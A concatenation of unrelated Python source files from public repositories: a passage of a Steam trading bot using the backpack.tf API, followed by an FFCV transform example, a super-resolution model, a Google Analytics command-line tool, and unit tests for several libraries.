print('[PROGRAM]: A required package is not installed, installing...')
main(['install', pkg])
print('[PROGRAM]: Installed package! Please restart this program to continue.')
input('press enter to close program...\n')
os._exit(0)
# def check_trade(trade_obj, items_value, typ):
# curr = trade_obj.sort(typ)
# value = calculate(curr[0], curr[1], curr[2], curr[3], curr[4])
# if typ == 'sell':
# b_curr = trade_obj.sort('buy')
# items_value += calculate(b_curr[0], b_curr[1], b_curr[2], b_curr[3], b_curr[4])
# else:
# s_curr = trade_obj.sort('sell')
# items_value += calculate(s_curr[0], s_curr[1], s_curr[2], s_curr[3], s_curr[4])
#
# logging.debug(f"TRADE {trade_obj.id} is a {typ} trade, and is worth {value}, with items being {items_value}")
# if typ == 'sell':
# if value >= items_value:
# return True
# else:
# return False
# else:
# if value <= items_value:
# return True
# else:
# return False
def heartbeat():
global past_time
print(f"[HEARTBEAT]: ~{90 - int(time.time() - past_time)} seconds until next heartbeat")
if int(time.time() - past_time) >= 90:
p = requests.post(f"https://backpack.tf/api/aux/heartbeat/v1?", data={"token": token, "automatic": "all"})
if p.status_code != 200:
print(f'[HEARTBEAT]: Error when sending heartbeat: {p.json()["message"]}')
logging.warning(f"ERROR SENDING HEARTBEAT: {p.json()['message']}")
else:
print("[HEARTBEAT]: Sent heartbeat to backpack.tf")
logging.info("HEARTBEAT SENT")
past_time = time.time()
if __name__ == '__main__':
print(start_text)
for pkg in packages:
check_install(pkg, packages.index(pkg)+1, '' if pkg!='backpackpy' else 'backpack.py')
from steampy.client import SteamClient
from steampy import confirmation
from steampy.exceptions import InvalidCredentials, ConfirmationExpected
#from backpackpy import listings
import requests
check_for_updates()
try:
with open('settings.json', 'r') as cfg:
try:
data = json.load(cfg)
try:
apikey, password, username, bkey, accept_escrow = data['apikey'],\
data['password'], data['username'], data['bkey'], data['accept_escrow']
token = requests.get(f"https://backpack.tf/api/aux/token/v1?key={bkey}").json()['token']
decline_trades = data.get('decline_trades', 1)
confirm_settings = data.get('confirm_options', 'trades')
except KeyError as k:
logging.warning(f'SETTINGS FILE MISSING {k} VALUE')
print(f'[settings.json]: Whoops! You are missing the {k} value')
input('Press enter to close program...\n')
os._exit(1)
except json.JSONDecodeError:
logging.warning('INVALID SETTINGS FILE')
print('[PROGRAM]: Whoops! It would seem that you settings.json file is invalid!')
input('press enter to close program...\n')
os._exit(1)
logging.debug("LOADED SETTINGS")
except FileNotFoundError:
logging.warning("SETTINGS NOT FOUND, CREATING")
print('[PROGRAM]: File settings.json not found! Would you like to make one?')
yn = input('[y/n]: ')
if yn[0].lower() == 'y':
apikey = input('[settings.json]: Enter your steam API key. (https://steamcommunity.com/dev/apikey)\n')
password = input('[settings.json]: Enter your password. \n')
username = input('[settings.json]: Enter your username. \n')
bkey = input('[settings.json]: Enter your backpack.tf API key. (https://backpack.tf/api/register)\n')
accept_escrow = input('[settings.json]: Accept escrow trades? (0 for no, 1 for yes)\n')
print('[PROGRAM]: Writing data to file...')
with open('settings.json', 'w') as file:
json.dump({'apikey':apikey, 'password':password, 'username':username, 'bkey':bkey,
"accept_escrow":accept_escrow}, file)
print('[PROGRAM]: Wrote to file')
else:
print("[PROGRAM]: Can't run without user information.")
input('Press enter to close program...\n')
os._exit(1)
client = SteamClient(apikey)
conf = None
print('[PROGRAM]: Obtaining bud and key values from backpack.tf...')
rJson = requests.get(f'https://backpack.tf/api/IGetCurrencies/v1?key={bkey}').json()['response']
logging.debug(f"KEY VALUE RESPONSE: {rJson}")
if rJson['success']:
key_price = rJson['currencies']['keys']['price']['value']
bud_price = rJson['currencies']['earbuds']['price']['value']
print(f'[PROGRAM]: Obtained values! KEY <{key_price} ref>, BUD <{bud_price} keys>.')
logging.debug("OBTAINED KEY AND BUD VALUES")
else:
logging.fatal("FAILED TO OBTAIN KEY AND BUG VALUES")
print(f'[backpack.tf]: {rJson["message"]}')
input('Press enter to close program...\n')
os._exit(1)
try:
client.login(username, password, '<PASSWORD>')
except json.decoder.JSONDecodeError:
logging.warning("STEAMGUARD FILE INVALID")
print('[steamguard.json]: Unable to read file.')
input('Press enter to close program...\n')
os._exit(1)
except FileNotFoundError:
logging.warning("UNABLE TO FIND STEAMGAURD FILE")
print('[steamguard.json]: Unable to find file.')
input('Press enter to close program...\n')
os._exit(1)
except InvalidCredentials:
logging.info("CREDENTIALS INVALID")
print('[PROGRAM]: Your username, password, ID and/or secrets are invalid.')
input('Press enter to close program...\n')
os._exit(1)
else:
conf = confirmation.ConfirmationExecutor(
client.steam_guard['identity_secret'],
client.steam_guard['steamid'],
client._session)
logging.info("CREATED CLIENT AND CONFIRMATION MANAGER")
print(f'[PROGRAM]: Connected to steam! Logged in as {username}')
try:
with open('trade.csv', 'r') as file:
reader = csv.DictReader(file)
count = 1
fails = []
for row in reader:
count += 1
try:
if row['type'].strip()[0].lower() == 's':
p = row['price'].split('.')
p = [int(i) for i in p]
price = calculate(p[0], p[1], p[2], p[3], p[4])
sell_trades[row['item_name'].strip().replace("$$", ",")] = price
elif row['type'].strip()[0].lower() == 'b':
p = row['price'].split('.')
p = [int(i) for i in p]
price = calculate(p[0], p[1], p[2], p[3], p[4])
buy_trades[row['item_name'].strip().replace("$$", ",")] = price
except AttributeError:
fails.append(count)
logging.info(f'LOADED TRADE DATA: BUY: {buy_trades} SELL: {sell_trades}')
except FileNotFoundError:
logging.warning("TRADE FILE NOT FOUND")
print('[trade.data]: Unable to find file.')
input('Press enter to close program...\n')
os._exit(1)
print(f'[CSV]: Failed to load these lines: {fails}')
print('[PROGRAM]: Finished loading trading data.')
# yn = input("Would you like to sync to backpack.tf listings?\n[y/n]: ")
# if yn[0].lower() == 'y':
# steamid = client.steam_guard['steamid']
# steam_inv = requests.get(f'http://steamcommunity.com/inventory/{steamid}/440/2?l=english&count=5000').json()
# bp_listings = requests.get("https://backpack.tf/api/classifieds/listings/v1?", data={'token':token}).json()
# class_id = False
# for classified in bp_listings["listings"]:
# asset_id = classified['id']
# for item in steam_inv['assets']:
# if item['assetid'] == classified['id']:
# class_id = item['classid']
# if class_id:
# for item in steam_inv['descriptions']:
# if item['classid'] == class_id:
# market_name = item['market_name']
# market_type = classified['intent']
# ref, keys = classified['currencies']['metal'], classified['currencies']['keys']
# sep = str(ref).split('.')
# if len(sep) == 2:
# price = calculate(int(sep[0])/11, 0, int(sep[0]), keys, 0)
# else:
# price = calculate(0, 0, int(ref), keys, 0)
# if market_type:
# sell_trades[market_name] = price
# else:
# buy_trades[market_name] = price
# print(buy_trades)
# print(sell_trades)
# os._exit(0)
try:
with open('whitelist.data', 'r') as file:
steam_ids = file.read()
if steam_ids:
for steam_id in steam_ids.split(','):
whitelist.append(steam_id)
print(f'[WHITELIST]: Whitelist created with the following ids: {whitelist}')
logging.info(f"LOADED WHITELIST: {whitelist}")
except FileNotFoundError:
logging.debug("WHITELIST NOT FOUND")
print('[PROGRAM]: Everything ready, starting trading.')
print('[PROGRAM]: Press Ctrl+C to close at any time.')
manager = TradeManager(client, conf)
while True:
if time.time() - start_time >= 3600:
pass
#subprocess.call(["python", os.path.join(sys.path[0], __file__)] + sys.argv[1:])
try:
heartbeat()
try:
manager.get_new_trades()
print('[TRADE-MANAGER] STEP 1 (get new trades) COMPLETE')
logging.debug("(STEP 1 COMPLETE)")
except json.decoder.JSONDecodeError:
print("[PROGRAM]: Unexpected error, taking a break (10 seconds).")
time.sleep(10)
print('Starting again...')
continue
manager.check_trades_content()
print('[TRADE-MANAGER]: STEP 2 (check new trades) COMPLETE')
logging.debug("(STEP 2 COMPLETE)")
manager.check_bad_trades()
print('[TRADE-MANAGER]: STEP 3 (check for trades gone bad) COMPLETE')
logging.debug("(STEP 3 COMPLETE)")
manager.check_good_trades()
print('[TRADE-MANAGER]: STEP 4 (check for successful trades) COMPLETE')
logging.debug("(STEP 4 COMPLETE)")
manager.confirm_check()
print('[TRADE-MANAGER]: STEP 5 (check confirmations) COMPLETE')
logging.debug("(STEP 5 COMPLETE)")
print('[PROGRAM]: Cooling down... (10)')
except InterruptedError:
os._exit(0)
except BaseException as BE:
print(f'[ERROR]: {type(BE).__name__}: {BE}')
logging.warning(f"UNEXPECTED ERROR: {type(BE).__name__}: {BE}")
time.sleep(10)
|
examples/docs_examples/custom_transform.py
|
neuroailab/ffcv
| 1,969 |
84410
|
"""
Example of defining a custom (image) transform using FFCV.
For tutorial, see https://docs.ffcv.io/ffcv_examples/custom_transforms.html.
"""
import time
import numpy as np
import torchvision
from ffcv.fields import IntField, RGBImageField
from ffcv.fields.decoders import SimpleRGBImageDecoder
from ffcv.loader import Loader, OrderOption
from ffcv.pipeline.compiler import Compiler
from ffcv.pipeline.operation import Operation, AllocationQuery
from ffcv.transforms import ToTensor
from ffcv.writer import DatasetWriter
from dataclasses import replace
class PickACorner(Operation):
def generate_code(self):
parallel_range = Compiler.get_iterator()
def pick_a_corner(images, dst):
which_corner = np.random.rand(images.shape[0])
for i in parallel_range(images.shape[0]):
if which_corner[i] == 0:
dst[i] = images[i,:images.shape[1]//2, :images.shape[2]//2]
else:
dst[i] = images[i,-images.shape[1]//2:, -images.shape[2]//2:]
return dst
pick_a_corner.is_parallel = True
return pick_a_corner
def declare_state_and_memory(self, previous_state):
h, w, c = previous_state.shape
new_shape = (h // 2, w // 2, c)
new_state = replace(previous_state, shape=new_shape)
mem_allocation = AllocationQuery(new_shape, previous_state.dtype)
return (new_state, mem_allocation)
# Step 1: Create an FFCV-compatible CIFAR-10 dataset
ds = torchvision.datasets.CIFAR10('/tmp', train=True, download=True)
writer = DatasetWriter('/tmp/cifar.beton', {
'image': RGBImageField(),
'label': IntField()
})
writer.from_indexed_dataset(ds)
# Step 2: Create data loaders
BATCH_SIZE = 512
# Create loaders
image_pipelines = {
'with': [SimpleRGBImageDecoder(), PickACorner(), ToTensor()],
'without': [SimpleRGBImageDecoder(), ToTensor()]
}
for name, pipeline in image_pipelines.items():
loader = Loader(f'/tmp/cifar.beton', batch_size=BATCH_SIZE,
num_workers=16, order=OrderOption.RANDOM,
drop_last=True, pipelines={'image': pipeline})
# First epoch includes compilation time
for ims, labs in loader: pass
start_time = time.time()
for _ in range(100):
for ims, labs in loader: pass
print(f'Method: {name} | Shape: {ims.shape} | Time per epoch: {(time.time() - start_time) / 100:.5f}s')
|
test/programytest/clients/events/test_client.py
|
cdoebler1/AIML2
| 345 |
84420
|
import unittest.mock
from programy.clients.config import ClientConfigurationData
from programy.clients.events.client import EventBotClient
from programytest.clients.arguments import MockArgumentParser
class MockEventBotClient(EventBotClient):
def __init__(self, id, argument_parser=None):
EventBotClient.__init__(self, id, argument_parser)
def get_client_configuration(self):
return ClientConfigurationData("events")
def load_license_keys(self):
pass
class MockRunningEventBotClient(EventBotClient):
def __init__(self, id, argument_parser=None):
EventBotClient.__init__(self, id, argument_parser)
self.prior = False
self.ran = False
self.post = False
def get_client_configuration(self):
return ClientConfigurationData("events")
def load_license_keys(self):
pass
def prior_to_run_loop(self):
self.prior = True
def wait_and_answer(self):
self.ran = True
def post_run_loop(self):
self.post = True
class EventBotClientTests(unittest.TestCase):
def test_init_raw(self):
arguments = MockArgumentParser()
with self.assertRaises(NotImplementedError):
client = EventBotClient("testevents", arguments)
def test_init_actual(self):
arguments = MockArgumentParser()
client = MockEventBotClient("testevents", arguments)
self.assertIsNotNone(client)
with self.assertRaises(NotImplementedError):
client.wait_and_answer()
def test_init_running(self):
arguments = MockArgumentParser()
client = MockRunningEventBotClient("testevents", arguments)
self.assertIsNotNone(client)
client.run()
self.assertTrue(client.prior)
self.assertTrue(client.ran)
self.assertTrue(client.post)
|
basicsr/archs/edsr_arch.py
|
Cospel/BasicSR
| 3,168 |
84422
|
import torch
from torch import nn as nn
from basicsr.archs.arch_util import ResidualBlockNoBN, Upsample, make_layer
from basicsr.utils.registry import ARCH_REGISTRY
@ARCH_REGISTRY.register()
class EDSR(nn.Module):
"""EDSR network structure.
Paper: Enhanced Deep Residual Networks for Single Image Super-Resolution.
Ref git repo: https://github.com/thstkdgus35/EDSR-PyTorch
Args:
num_in_ch (int): Channel number of inputs.
num_out_ch (int): Channel number of outputs.
num_feat (int): Channel number of intermediate features.
Default: 64.
num_block (int): Block number in the trunk network. Default: 16.
upscale (int): Upsampling factor. Support 2^n and 3.
Default: 4.
res_scale (float): Used to scale the residual in residual block.
Default: 1.
img_range (float): Image range. Default: 255.
rgb_mean (tuple[float]): Image mean in RGB orders.
Default: (0.4488, 0.4371, 0.4040), calculated from DIV2K dataset.
"""
def __init__(self,
num_in_ch,
num_out_ch,
num_feat=64,
num_block=16,
upscale=4,
res_scale=1,
img_range=255.,
rgb_mean=(0.4488, 0.4371, 0.4040)):
super(EDSR, self).__init__()
self.img_range = img_range
self.mean = torch.Tensor(rgb_mean).view(1, 3, 1, 1)
self.conv_first = nn.Conv2d(num_in_ch, num_feat, 3, 1, 1)
self.body = make_layer(ResidualBlockNoBN, num_block, num_feat=num_feat, res_scale=res_scale, pytorch_init=True)
self.conv_after_body = nn.Conv2d(num_feat, num_feat, 3, 1, 1)
self.upsample = Upsample(upscale, num_feat)
self.conv_last = nn.Conv2d(num_feat, num_out_ch, 3, 1, 1)
def forward(self, x):
self.mean = self.mean.type_as(x)
x = (x - self.mean) * self.img_range
x = self.conv_first(x)
res = self.conv_after_body(self.body(x))
res += x
x = self.conv_last(self.upsample(res))
x = x / self.img_range + self.mean
return x
|
tests/packagedcode/data/pypi/setup.py/arpy_setup.py
|
s4-2/scancode-toolkit
| 1,511 |
84432
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from distutils.core import setup
setup(name='arpy',
version='0.1.1',
description='Library for accessing "ar" files',
author=u'<NAME>',
author_email='<EMAIL>',
url='http://bitbucket.org/viraptor/arpy',
py_modules=['arpy'],
license="Simplified BSD",
)
|
googleanalytics/commands/query.py
|
ruber0id/google-analytics
| 170 |
84439
|
# encoding: utf-8
import json
import yaml
import click
import googleanalytics as ga
from googleanalytics import utils
from .common import cli
# TODO: the blueprint stuff can probably be simplified so that
# it's little more than just a call to ga.describe
def from_blueprint(scope, src):
description = yaml.load(src)
blueprint = ga.Blueprint(description)
credentials = {}
credentials.update(blueprint.identity or {})
credentials.update(blueprint.scope)
profile = ga.authenticate(interactive=True, save=True, **credentials)
return blueprint.queries(profile)
# TODO: add any query generation improvements not associated with
# string parsing back into blueprint generation and query.refine
# so they apply across the board
def from_args(scope, metrics,
start, stop, days, limit,
dimensions, filter, segment,
**description):
# LIMIT can be a plain limit or start and length
if limit:
limit = list(map(int, limit.split(',')))
description.update({
'range': {
'start': start,
'stop': stop,
'days': days,
},
'metrics': utils.cut(metrics, ','),
'limit': limit,
})
if dimensions:
description['dimensions'] = utils.cut(dimensions, ',')
query = ga.query.describe(scope, description)
for f in filter:
query = ga.query.refine(query, {'filter': dict(utils.cut(f, '=', ','))})
for s in segment:
query = ga.query.refine(query, {'segment': dict(utils.cut(s, '=', ','))})
return [query]
# TODO: maybe include an --interactive option, which defers
# to `shell` but with a prefilled query?
@cli.command()
@click.argument('metrics')
@click.option('--dimensions')
@click.option('--start',
help='Start date in ISO format, e.g. 2016-01-01.')
@click.option('--stop')
@click.option('--days',
help='Days to count forward from start date, counts backwards when negative.',
default=0,
type=int)
@click.option('--limit',
help='Return only the first <n> or <start>,<n> results.')
@click.option('--sort',
help='Sort by a metric; prefix with - to sort from high to low.')
@click.option('--debug',
is_flag=True)
@click.option('--filter',
multiple=True)
@click.option('--segment',
multiple=True)
@click.option('--precision',
type=click.IntRange(0, 2),
default=1,
help='Increase or decrease query precision.')
@click.option('-i', '--interval',
type=click.Choice(['hour', 'day', 'week', 'month', 'year', 'total']),
default='total',
help='Return hourly, daily etc. numbers.')
@click.option('-o', '--output',
type=click.Choice(['csv', 'json', 'ascii']),
default='ascii',
help='Output format; human-readable ascii table by default.')
@click.option('--with-metadata',
is_flag=True)
@click.option('-b', '--blueprint',
type=click.File('r'))
@click.option('--realtime',
is_flag=True,
help='Use the RealTime API instead of the Core API.')
@click.pass_obj
def query(scope, blueprint, debug, output, with_metadata, realtime, **description):
"""
e.g.
googleanalytics --identity debrouwere --account debrouwere --webproperty http://debrouwere.org \
query pageviews \
--start yesterday --limit -10 --sort -pageviews \
--dimensions pagepath \
--debug
"""
if realtime:
description['type'] = 'realtime'
if blueprint:
queries = from_blueprint(scope, blueprint)
else:
if not isinstance(scope, ga.account.Profile):
raise ValueError("Account and webproperty needed for query.")
queries = from_args(scope, **description)
for query in queries:
if debug:
click.echo(query.build())
report = query.serialize(format=output, with_metadata=with_metadata)
click.echo(report)
|
colour/appearance/tests/test_hunt.py
|
colour-science/colour
| 1,380 |
84490
|
# !/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Defines the unit tests for the :mod:`colour.appearance.hunt` module.
"""
import numpy as np
from itertools import permutations
from colour.appearance import (VIEWING_CONDITIONS_HUNT, InductionFactors_Hunt,
XYZ_to_Hunt)
from colour.appearance.tests.common import AbstractColourAppearanceModelTest
from colour.utilities import (as_float_array, domain_range_scale,
ignore_numpy_errors, tstack)
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2021 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = '<EMAIL>'
__status__ = 'Production'
__all__ = ['TestHuntColourAppearanceModel']
class TestHuntColourAppearanceModel(AbstractColourAppearanceModelTest):
"""
Defines :mod:`colour.appearance.hunt` module unit tests methods for
*Hunt* colour appearance model.
"""
FIXTURE_BASENAME = 'hunt.csv'
OUTPUT_ATTRIBUTES = {
'J': 'J',
'C_94': 'C',
'h_S': 'h',
's': 's',
'Q': 'Q',
'M94': 'M'
}
def output_specification_from_data(self, data):
"""
Returns the *Hunt* colour appearance model output specification from
given data.
Parameters
----------
data : list
Fixture data.
Returns
-------
CAM_Specification_Hunt
Hunt colour appearance model specification.
"""
XYZ = tstack([data['X'], data['Y'], data['Z']])
XYZ_w = tstack([data['X_w'], data['Y_w'], data['Z_w']])
XYZ_b = tstack([data['X_w'], 0.2 * data['Y_w'], data['Z_w']])
specification = XYZ_to_Hunt(
XYZ,
XYZ_w,
XYZ_b,
data['L_A'],
InductionFactors_Hunt(data['N_c'], data['N_b']),
CCT_w=data['T'])
return specification
def test_domain_range_scale_XYZ_to_Hunt(self):
"""
Tests :func:`colour.appearance.hunt.XYZ_to_Hunt` definition domain
and range scale support.
"""
XYZ = np.array([19.01, 20.00, 21.78])
XYZ_w = np.array([95.05, 100.00, 108.88])
XYZ_b = np.array([95.05, 100.00, 108.88])
L_A = 318.31
surround = VIEWING_CONDITIONS_HUNT['Normal Scenes']
CCT_w = 6504.0
specification = XYZ_to_Hunt(
XYZ, XYZ_w, XYZ_b, L_A, surround, CCT_w=CCT_w)
d_r = (
('reference', 1, 1),
(1, 0.01, np.array([1, 1, 1 / 360, 1, 1, 1, np.nan, np.nan])),
(100, 1, np.array([1, 1, 100 / 360, 1, 1, 1, np.nan, np.nan])),
)
for scale, factor_a, factor_b in d_r:
with domain_range_scale(scale):
np.testing.assert_almost_equal(
XYZ_to_Hunt(
XYZ * factor_a,
XYZ_w * factor_a,
XYZ_b * factor_a,
L_A,
surround,
CCT_w=CCT_w),
as_float_array(specification) * factor_b,
decimal=7)
@ignore_numpy_errors
def test_raise_exception_CIECAM02_to_XYZ(self):
"""
Tests :func:`colour.appearance.hunt.XYZ_to_Hunt` definition raised
exception.
"""
XYZ = np.array([19.01, 20.00, 21.78])
XYZ_w = np.array([95.05, 100.00, 108.88])
XYZ_b = np.array([95.05, 100.00, 108.88])
L_A = 318.31
surround = VIEWING_CONDITIONS_HUNT['Normal Scenes']
CCT_w = 6504.0
S = S_w = 0.5
try:
XYZ_to_Hunt(XYZ, XYZ_w, XYZ_b, L_A, surround)
except ValueError:
pass
try:
XYZ_to_Hunt(XYZ, XYZ_w, XYZ_b, L_A, surround, CCT_w=CCT_w, S=S)
except ValueError:
pass
try:
XYZ_to_Hunt(XYZ, XYZ_w, XYZ_b, L_A, surround, CCT_w=CCT_w, S_w=S_w)
except ValueError:
pass
@ignore_numpy_errors
def test_XYZ_p_CIECAM02_to_XYZ(self):
"""
Tests :func:`colour.appearance.hunt.XYZ_to_Hunt` definition *XYZ_p*
argument handling.
"""
XYZ = np.array([19.01, 20.00, 21.78])
XYZ_w = np.array([95.05, 100.00, 108.88])
XYZ_b = XYZ_p = np.array([95.05, 100.00, 108.88])
L_A = 318.31
surround = VIEWING_CONDITIONS_HUNT['Normal Scenes']
CCT_w = 6504.0
np.testing.assert_almost_equal(
XYZ_to_Hunt(
XYZ,
XYZ_w,
XYZ_b,
L_A,
surround,
XYZ_p=XYZ_p,
CCT_w=CCT_w,
),
np.array([
30.046267861960700, 0.121050839936350, 269.273759446144600,
0.019909320692942, 22.209765491265024, 0.123896438259997,
np.nan, np.nan
]),
decimal=7)
@ignore_numpy_errors
def test_nan_XYZ_to_Hunt(self):
"""
Tests :func:`colour.appearance.hunt.XYZ_to_Hunt` definition
nan support.
"""
cases = [-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]
cases = set(permutations(cases * 3, r=3))
for case in cases:
XYZ = np.array(case)
XYZ_w = np.array(case)
XYZ_b = np.array(case)
L_A = case[0]
surround = InductionFactors_Hunt(case[0], case[0])
CCT_w = case[0]
XYZ_to_Hunt(XYZ, XYZ_w, XYZ_b, L_A, surround, CCT_w=CCT_w)
|
tests/test_self_signed_jwt.py
|
Yoni-Mantzur/azure-activedirectory-library-for-python
| 258 |
84493
|
#------------------------------------------------------------------------------
#
# Copyright (c) Microsoft Corporation.
# All rights reserved.
#
# This code is licensed under the MIT License.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files(the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions :
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
#------------------------------------------------------------------------------
import sys
import requests
import httpretty
import json
from datetime import datetime
try:
import unittest2 as unittest
except ImportError:
import unittest
try:
from unittest import mock
except ImportError:
import mock
import adal
from adal.authority import Authority
from adal import self_signed_jwt
from adal.self_signed_jwt import SelfSignedJwt
from adal.authentication_context import AuthenticationContext
from tests import util
from tests.util import parameters as cp
class TestSelfSignedJwt(unittest.TestCase):
testNowDate = cp['nowDate']
testJwtId = cp['jwtId']
expectedJwtWithThumbprint = cp['expectedJwtWithThumbprint']
expectedJwtWithPublicCert = cp['expectedJwtWithPublicCert']
unexpectedJwt = 'unexpectedJwt'
testAuthority = Authority('https://login.microsoftonline.com/naturalcauses.com', False)
testClientId = 'd6835713-b745-48d1-bb62-7a8248477d35'
testCert = cp['cert']
testPublicCert=cp['publicCert']
def _create_jwt(self, cert, thumbprint, public_certificate = None, encodeError = None):
ssjwt = SelfSignedJwt(cp['callContext'], self.testAuthority, self.testClientId)
self_signed_jwt._get_date_now = mock.MagicMock(return_value = self.testNowDate)
self_signed_jwt._get_new_jwt_id = mock.MagicMock(return_value = self.testJwtId)
if encodeError:
self_signed_jwt._encode_jwt = mock.MagicMock(return_value = self.unexpectedJwt)
else:
expected = self.expectedJwtWithPublicCert if public_certificate else self.expectedJwtWithThumbprint
self_signed_jwt._encode_jwt = mock.MagicMock(return_value = expected)
jwt = ssjwt.create(cert, thumbprint, public_certificate=public_certificate)
return jwt
def _create_jwt_and_match_expected_err(self, testCert, thumbprint, encodeError = None):
with self.assertRaises(Exception):
self._create_jwt(testCert, thumbprint, encodeError = encodeError)
def _create_jwt_and_match_expected_jwt(self, cert, thumbprint):
jwt = self._create_jwt(cert, thumbprint)
self.assertTrue(jwt, 'No JWT generated')
self.assertTrue(jwt == self.expectedJwtWithThumbprint, 'Generated JWT does not match expected:{}'.format(jwt))
def test_jwt_hash_with_public_cert(self):
jwt = self._create_jwt(self.testCert, cp['certHash'], public_certificate = self.testPublicCert)
self.assertTrue(jwt == self.expectedJwtWithPublicCert, 'Generated JWT does not match expected:{}'.format(jwt))
def test_create_jwt_hash_colons(self):
self._create_jwt_and_match_expected_jwt(self.testCert, cp['certHash'])
def test_create_jwt_hash_spaces(self):
thumbprint = cp['certHash'].replace(':', ' ')
self._create_jwt_and_match_expected_jwt(self.testCert, thumbprint)
def test_create_jwt_hash_straight_hex(self):
thumbprint = cp['certHash'].replace(':', '')
self._create_jwt_and_match_expected_jwt(self.testCert, thumbprint)
def test_create_jwt_invalid_cert(self):
self._create_jwt_and_match_expected_err('foobar', cp['certHash'], encodeError = True)
def test_create_jwt_invalid_thumbprint_1(self):
self._create_jwt_and_match_expected_err(self.testCert, 'zzzz')
def test_create_jwt_invalid_thumbprint_wrong_size(self):
thumbprint = 'C1:5D:EA:86:56:AD:DF:67:BE:80:31:D8:5E:BD:DC:5A:D6:C4:36:E7:AA'
self._create_jwt_and_match_expected_err(self.testCert, thumbprint)
def test_create_jwt_invalid_thumbprint_invalid_char(self):
thumbprint = 'C1:5D:EA:86:56:AD:DF:67:BE:80:31:D8:5E:BD:DC:5A:D6:C4:36:Ez'
self._create_jwt_and_match_expected_err(self.testCert, thumbprint)
if __name__ == '__main__':
unittest.main()
|
backend/db/test/user_photo_test.py
|
sleepingAnt/viewfinder
| 645 |
84537
|
<filename>backend/db/test/user_photo_test.py
# Copyright 2013 Viewfinder Inc. All Rights Reserved
"""Tests for UserPhoto data object."""
__author__ = '<EMAIL> (<NAME>)'
from base_test import DBBaseTestCase
from viewfinder.backend.db.user_photo import UserPhoto
from viewfinder.backend.db import versions
class UserPhotoTestCase(DBBaseTestCase):
def testAssetKeyToFingerprint(self):
def test(asset_key, expected):
self.assertEqual(UserPhoto.AssetKeyToFingerprint(asset_key), expected)
test('', None)
test('a/', None)
test('a/b', None)
test('a/#', None)
test('a/b#', None)
test('a/b#c', 'a/#c')
test('a/b##c', 'a/#c')
test('a/assets-library://asset/asset.JPG?id=D31F1D3C-CFB7-458F-BACD-7862D72098A6&ext=JPG#e5ad400c2214088928ef8400dcfb87bb3059b742',
'a/#e5ad400c2214088928ef8400dcfb87bb3059b742')
test('a/assets-library://asset/asset.JPG?id=D31F1D3C-CFB7-458F-BACD-7862D72098A6&ext=JPG',
None)
test('a/#e5ad400c2214088928ef8400dcfb87bb3059b742',
'a/#e5ad400c2214088928ef8400dcfb87bb3059b742')
def testMigration(self):
user_photo = UserPhoto.CreateFromKeywords(
user_id=1, photo_id='p1',
asset_keys=['a/b', 'a/c#d', 'a/e#d', 'a/f#g'])
user_photo._version = versions.REMOVE_ASSET_URLS.rank - 1
self._RunAsync(versions.Version.MaybeMigrate, self._client, user_photo,
[versions.REMOVE_ASSET_URLS])
print user_photo
self.assertEqual(user_photo.asset_keys.combine(), set(['a/#d', 'a/#g']))
def testMergeAssetKeys(self):
user_photo = UserPhoto.CreateFromKeywords(
user_id=1, photo_id='p1',
asset_keys=['a/#b', 'a/#f'])
user_photo.MergeAssetKeys(['a/b#c', 'a/d#c', 'a/e#f'])
self.assertEqual(user_photo.asset_keys.combine(), set(['a/#b', 'a/#c', 'a/#f']))
|
tests/index_routines.py
|
Saran-nns/cunumeric
| 118 |
84541
|
<reponame>Saran-nns/cunumeric
# Copyright 2021 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
from test_tools.generators import mk_seq_array
import cunumeric as num
from legate.core import LEGATE_MAX_DIM
def test():
choices1 = [
[0, 1, 2, 3],
[10, 11, 12, 13],
[20, 21, 22, 23],
[30, 31, 32, 33],
]
a1 = [2, 3, 1, 0]
num_a1 = num.array(a1)
num_choices1 = num.array(choices1)
aout = np.array([2.3, 3.0, 1.2, 0.3])
num_aout = num.array(aout)
assert np.array_equal(
np.choose(a1, choices1, out=aout),
num.choose(num_a1, num_choices1, out=num_aout),
)
assert np.array_equal(aout, num_aout)
b = [2, 4, 1, 0]
num_b = num.array(b)
assert np.array_equal(
np.choose(b, choices1, mode="clip"),
num.choose(num_b, num_choices1, mode="clip"),
)
assert np.array_equal(
np.choose(b, choices1, mode="wrap"),
num.choose(num_b, num_choices1, mode="wrap"),
)
a2 = [[1, 0, 1], [0, 1, 0], [1, 0, 1]]
choices2 = [-10, 10]
num_a2 = num.array(a2)
num_choices2 = num.array(choices2)
assert np.array_equal(
num.choose(num_a2, num_choices2), np.choose(a2, choices2)
)
a3 = np.array([0, 1]).reshape((2, 1, 1))
c1 = np.array([1, 2, 3]).reshape((1, 3, 1))
c2 = np.array([-1, -2, -3, -4, -5]).reshape((1, 1, 5))
num_a3 = num.array(a3)
num_c1 = num.array(c1)
num_c2 = num.array(c2)
assert np.array_equal(
np.choose(a3, (c1, c2)), num.choose(num_a3, (num_c1, num_c2))
